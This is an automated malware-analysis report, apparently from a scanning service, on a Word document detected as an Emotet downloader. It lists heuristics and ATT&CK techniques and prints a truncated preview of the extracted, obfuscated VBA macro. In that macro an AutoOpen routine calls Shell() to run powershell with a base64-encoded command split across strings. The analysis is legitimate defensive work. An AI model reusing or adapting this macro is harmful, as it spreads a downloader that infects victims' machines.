Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6899214-0'. Static analysis reveals the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands, likely to download and run a secondary payload, a common Emotet distribution technique.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6899214-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6899214-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12519 bytes |

SHA-256 (macros.bas): a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
For qLwNi = lEGdv To 86061
jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
For mcGwp = PaUTFj To 23178
XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
For RfkLA = jbnvA To 61731
cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
For hUFQij = pzpzf To 33750
pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
For KljRXp = WXmvBi To 37475
wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
HPWDtw = 60134 - 44708
Next
End Sub
Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
For bWAuj = kzKiPl To 53753
cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
For fPiQTz = jRrRj To 18717
COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
For zwUuVw = djMMqi To 87585
SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
For VkWwFi = sphbqS To 55661
wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
For wdoIlk = HjhkmE To 40678
aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
For krVhu = kqlhQr To 8997
iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
For pPBOL = HIwLcs To 39400
RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
For sbrzL = wdiBp To 36481
dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "U
... (truncated)